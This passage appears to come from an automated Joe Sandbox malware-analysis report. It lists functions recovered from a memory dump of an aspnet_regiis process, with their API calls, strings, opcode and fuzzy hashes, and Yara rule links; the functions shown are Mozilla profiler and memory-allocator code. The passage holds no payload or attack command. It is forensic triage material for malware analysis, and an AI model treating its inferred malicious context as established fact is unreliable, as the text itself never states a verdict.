                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                            • String ID: CoInitializeEx$combase.dll
                                                                                                                            • API String ID: 4190559335-2063391169
                                                                                                                            • Opcode ID: 9b4776a9a46fb841682a5aa1a9232009e922a13b3e1a592facaed01465ba5a55
                                                                                                                            • Instruction ID: 6c542c261e45280740ae9d39c3280ce8ab3f9b1bf5917cfd9b8c899825694c9e
                                                                                                                            • Opcode Fuzzy Hash: 9b4776a9a46fb841682a5aa1a9232009e922a13b3e1a592facaed01465ba5a55
                                                                                                                            • Instruction Fuzzy Hash: A01170756052559FDF14CFD5ED1CA5E77B4FB8A326F004229E90993740F730A405CBA5
                                                                                                                            Function 6CC6F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F559
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC6F561
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F577
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F585
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC6F5A3
                                                                                                                            Strings
                                                                                                                            • [I %d/%d] profiler_resume, xrefs: 6CC6F239
                                                                                                                            • [I %d/%d] profiler_resume_sampling, xrefs: 6CC6F499
                                                                                                                            • [I %d/%d] profiler_pause_sampling, xrefs: 6CC6F3A8
                                                                                                                            • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC6F56A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                            • API String ID: 2848912005-2840072211
                                                                                                                            • Opcode ID: 3ec7607d7bf8eb7348bd650503595159c262c8509e13f237f98c2b965738b0b8
                                                                                                                            • Instruction ID: d91bc12fe88601489164b7956356eab7b66ed4b61fab1d4ba57e68d976f6b4ed
                                                                                                                            • Opcode Fuzzy Hash: 3ec7607d7bf8eb7348bd650503595159c262c8509e13f237f98c2b965738b0b8
                                                                                                                            • Instruction Fuzzy Hash: 61F05475600208AFDA006BE5AC9CA6E7BBDEB8A39DF040055FA0583F01EB758C058775
                                                                                                                            Function 6CC30E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll,6CC30DF8), ref: 6CC30E82
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CC30EA1
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC30EB5
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC30EC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                            • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                            • API String ID: 391052410-1680159014
                                                                                                                            • Opcode ID: 2e078574ee05372eff264a0e7107c49f6368f81cfa56a69085b21cbd1fb631e1
                                                                                                                            • Instruction ID: 4273a859ee2bd5f744afa6e455e1be2db0ac87f52598e3703a641d473954b8ec
                                                                                                                            • Opcode Fuzzy Hash: 2e078574ee05372eff264a0e7107c49f6368f81cfa56a69085b21cbd1fb631e1
                                                                                                                            • Instruction Fuzzy Hash: 61014671B0429A8FEF028FE9F82CA5A33B5F746319F101529E909C3B80FB70A8158B51
                                                                                                                            Function 6CC6F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F619
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC6F598), ref: 6CC6F621
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F637
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F645
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F663
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC6F62A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                            • API String ID: 2848912005-753366533
                                                                                                                            • Opcode ID: 1ccbfb73c44524be17ea4592d463ac0753ffb53683f6c7cd167b0cbb1572b006
                                                                                                                            • Instruction ID: 48c34cf4b3cbaf81eb411eaf4beea278835d0ee18b609634389f14617e9b3a00
                                                                                                                            • Opcode Fuzzy Hash: 1ccbfb73c44524be17ea4592d463ac0753ffb53683f6c7cd167b0cbb1572b006
                                                                                                                            • Instruction Fuzzy Hash: 38F08975200208AFDB006BE5EC9CA6E7B7DEB8A39DF040055FA0583F41EB768C058775
                                                                                                                            Function 6CC605F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CC5CFAE,?,?,?,6CC231A7), ref: 6CC605FB
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CC5CFAE,?,?,?,6CC231A7), ref: 6CC60616
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CC231A7), ref: 6CC6061C
                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CC231A7), ref: 6CC60627
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _writestrlen
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 2723441310-2186867486
                                                                                                                            • Opcode ID: c95b594a5e7325af641e88a98f41b30453429c06dadc1dc1082e7a892728860e
                                                                                                                            • Instruction ID: e38ddaa6438b8976ff516ca27208bc975114f853efdb92771b5e80a6a93ad8fe
                                                                                                                            • Opcode Fuzzy Hash: c95b594a5e7325af641e88a98f41b30453429c06dadc1dc1082e7a892728860e
                                                                                                                            • Instruction Fuzzy Hash: 85E08CE2A0101437F5142256BC8ADFB762CEBC6274F080039FD0D83701F94AAD1A51F6
                                                                                                                            Function 6CC305F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4ae994df98b0138b479fd91ad17a960e980679a4f3bc9064250bf8eaeada8877
                                                                                                                            • Instruction ID: 5dec5d65e66788737737b641571a2156ddceeee537a65a25f384527489bbb9b5
                                                                                                                            • Opcode Fuzzy Hash: 4ae994df98b0138b479fd91ad17a960e980679a4f3bc9064250bf8eaeada8877
                                                                                                                            • Instruction Fuzzy Hash: 7DA178B1A00615CFDB24CF29D598A9AFBF1BF49304F44866ED84A97B01E730A955CFA0
                                                                                                                            Function 6CC814A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC814C5
                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC814E2
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC81546
                                                                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC815BA
                                                                                                                            • free.MOZGLUE(?), ref: 6CC816B4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1909280232-0
                                                                                                                            • Opcode ID: 86711e7411c49a73e7c08669080eb88d07967a4d6d142b1c317f4fc4eb1b4be0
                                                                                                                            • Instruction ID: cdc5f1f42eaa7503661bfe364a52d1fedb0fcea4cb8dc0b6205b1ba624051534
                                                                                                                            • Opcode Fuzzy Hash: 86711e7411c49a73e7c08669080eb88d07967a4d6d142b1c317f4fc4eb1b4be0
                                                                                                                            • Instruction Fuzzy Hash: D761DE72A017049FDB218F25D880BDEBBB4FF89308F44851CED9A57641EB31E959CB91
                                                                                                                            Function 6CC79F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC79FDB
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC79FF0
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A006
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC7A0BE
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A0D5
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC7A0EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 956590011-0
                                                                                                                            • Opcode ID: a6ed894479d4c8173da01ded810d5428e0ed180ca17217827bdcf20ae55c9033
                                                                                                                            • Instruction ID: 18c4004705d6ab6aed9daa22d692ef8cdea3859679f95cc409a64aed7c6b82e2
                                                                                                                            • Opcode Fuzzy Hash: a6ed894479d4c8173da01ded810d5428e0ed180ca17217827bdcf20ae55c9033
                                                                                                                            • Instruction Fuzzy Hash: 7161AF759096019FC721CF18C48059AB3F5FFC8328F549659E89A9B702EB32E986CBD1
                                                                                                                            Function 6CC7DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7DC60
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC7D38A,?), ref: 6CC7DC6F
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6CC7D38A,?), ref: 6CC7DCC1
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC7D38A,?), ref: 6CC7DCE9
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC7D38A,?), ref: 6CC7DD05
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC7D38A,?), ref: 6CC7DD4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1842996449-0
                                                                                                                            • Opcode ID: c3126cc6e49aba33c929f4e6435d777376f643a6bed97465693d0f7badd72c35
                                                                                                                            • Instruction ID: 5053a11cbd048969147173701175f04553b81ca9fcd2249fb8068985d1dca16a
                                                                                                                            • Opcode Fuzzy Hash: c3126cc6e49aba33c929f4e6435d777376f643a6bed97465693d0f7badd72c35
                                                                                                                            • Instruction Fuzzy Hash: CB416DB5E00615CFCB10CFA9D89499ABBF5FF88314B5545A9D945A7B10E771FC00CBA0
                                                                                                                            Function 6CC66590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5FA80: GetCurrentThreadId.KERNEL32 ref: 6CC5FA8D
                                                                                                                              • Part of subcall function 6CC5FA80: AcquireSRWLockExclusive.KERNEL32(6CCAF448), ref: 6CC5FA99
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC66727
                                                                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC667C8
                                                                                                                              • Part of subcall function 6CC74290: memcpy.VCRUNTIME140(?,?,6CC82003,6CC80AD9,?,6CC80AD9,00000000,?,6CC80AD9,?,00000004,?,6CC81A62,?,6CC82003,?), ref: 6CC742C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                            • String ID: data
                                                                                                                            • API String ID: 511789754-2918445923
                                                                                                                            • Opcode ID: 91af5e95a8f05afcde120df54c1ad99cb0065dbb6e8955f85fe82edf77277c6d
                                                                                                                            • Instruction ID: 7efbea3928eb9fb32298e51418bd55f17dc7cf4a2b8701dfa1d5dfa867e684d0
                                                                                                                            • Opcode Fuzzy Hash: 91af5e95a8f05afcde120df54c1ad99cb0065dbb6e8955f85fe82edf77277c6d
                                                                                                                            • Instruction Fuzzy Hash: 0DD1BD75A047408FD724CF26D891B9FBBE5AFC5308F10892DE48997B91FB30A849CB52
                                                                                                                            Function 6CC5D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC2EB57,?,?,?,?,?,?,?,?,?), ref: 6CC5D652
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC2EB57,?), ref: 6CC5D660
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC2EB57,?), ref: 6CC5D673
                                                                                                                            • free.MOZGLUE(?), ref: 6CC5D888
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$memsetmoz_xmalloc
                                                                                                                            • String ID: |Enabled
                                                                                                                            • API String ID: 4142949111-2633303760
                                                                                                                            • Opcode ID: f9d8fc9eccc8a6b63442bba83296651def20d895ddc582f4928ccda01ed803f5
                                                                                                                            • Instruction ID: da9f354a2fe57839c76a1d338ca66c16ce944f673a7ab13b29559ccb31b198fc
                                                                                                                            • Opcode Fuzzy Hash: f9d8fc9eccc8a6b63442bba83296651def20d895ddc582f4928ccda01ed803f5
                                                                                                                            • Instruction Fuzzy Hash: 5CA114B0A003148FDB10CF69C5907AEBBF1AF49318F54845CD889AB781E735E965CBE5
                                                                                                                            Function 6CC5F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC5F480
                                                                                                                              • Part of subcall function 6CC2F100: LoadLibraryW.KERNEL32(shell32,?,6CC9D020), ref: 6CC2F122
                                                                                                                              • Part of subcall function 6CC2F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC2F132
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC5F555
                                                                                                                              • Part of subcall function 6CC314B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC31248,6CC31248,?), ref: 6CC314C9
                                                                                                                              • Part of subcall function 6CC314B0: memcpy.VCRUNTIME140(?,6CC31248,00000000,?,6CC31248,?), ref: 6CC314EF
                                                                                                                              • Part of subcall function 6CC2EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC2EEE3
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC5F4FD
                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC5F523
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                            • String ID: \oleacc.dll
                                                                                                                            • API String ID: 2595878907-3839883404
                                                                                                                            • Opcode ID: 51d1c79b012c40a42e3be987e86c3f156fc8fa789989bdeca7f374ce10684c1f
                                                                                                                            • Instruction ID: b2a308d45829f558585f99789aa9cad8b7f42d7d48c058912a8525c5b6312a46
                                                                                                                            • Opcode Fuzzy Hash: 51d1c79b012c40a42e3be987e86c3f156fc8fa789989bdeca7f374ce10684c1f
                                                                                                                            • Instruction Fuzzy Hash: 9141D0306087109FE724DF69D984B9BB7F4AF44318F900A1CF59493650FB30E969CB96
                                                                                                                            Function 6CC874A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 6CC87526
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC87566
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC87597
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer$ErrorLast
                                                                                                                            • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                            • API String ID: 3217676052-1401603581
